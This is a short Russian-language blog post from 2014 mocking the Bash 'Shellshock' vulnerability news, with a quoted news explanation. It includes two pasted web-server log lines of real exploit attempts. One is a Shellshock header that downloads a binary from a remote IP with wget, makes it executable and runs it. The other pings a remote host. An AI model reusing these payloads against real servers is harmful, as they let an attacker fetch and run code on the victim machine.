igor (ico) wrote,
igor
ico

WTF?!

В Bash есть переменные окружения, которые можно задавать согласно специальному синтаксису при вызове оболочки. Оболочка запускается и задает значения переменных, прописанные в синтаксисе. Уязвимость заключается в том, что непосредственно в самом задаваемом значении переменной можно дописать произвольные команды, которые оболочка также выполнит. В случае если Bash назначена системной оболочкой по умолчанию, она может быть использована злоумышленниками для проведения сетевых атак на серверы с применением веб-запросов.

fr. http://pda.cnews.ru/news/index.shtml?top/2014/09/25/587002

типа люди открыли для себя bash и то, что он может запускать команды из переменных окружения?! :)

куда катится этот мир...

upd: в наглоязычном приписка: "Authentication: Not required to exploit" и приписка про "AcceptEnv" И OpenSSL...
upd1: ой, а в логах еще смешнее:
162.253.66.76 - - [25/Sep/2014:07:27:07 +0400] "GET / HTTP/1.0" 400 317 "() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
89.207.135.125 - - [25/Sep/2014:12:12:38 +0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 46266 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

видимо, всякие web-traceroute, ping итп точно уже расхакали :)
Tags: it, security, сми
Subscribe

  • Post a new comment

    Error

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
  • 0 comments